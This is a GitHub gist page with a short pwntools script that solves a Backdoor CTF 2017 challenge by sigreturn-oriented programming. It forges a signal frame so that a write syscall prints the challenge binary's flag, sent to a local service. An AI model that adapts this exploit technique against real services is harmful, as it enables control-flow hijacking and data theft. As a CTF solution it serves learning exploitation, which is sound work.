Skip to content

Instantly share code, notes, and snippets.

@sudhackar

sudhackar/srop.py

Created September 27, 2017 14:48
Show Gist options
  • Save sudhackar/518606e5861c8f5a0e1b1de449a4fe78 to your computer and use it in GitHub Desktop.
Save sudhackar/518606e5861c8f5a0e1b1de449a4fe78 to your computer and use it in GitHub Desktop.
Download ZIP
[Backdoor CTF 2017] SROP
Raw
srop.py
from pwn import *
context(arch='amd64', os='linux', log_level='info')
'''
Syscall# Param 1 Param 2 Param 3 Param 4 Param 5 Param 6
rax rdi rsi rdx r10 r8 r9
we make a write(STDOUT, *flag, len(flag))
'''
binary = ELF("/tmp/player_bin")
s = remote('127.0.0.1', 5000)
frame = SigreturnFrame(kernel='amd64')
frame.rax = constants.SYS_write
frame.rdi = constants.STDOUT_FILENO
frame.rsi = binary.symbols['flag']
frame.rdx = 100
frame.rsp = 0xdeadbeef
frame.rip = binary.symbols['syscall']
s.sendline(str(frame))
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment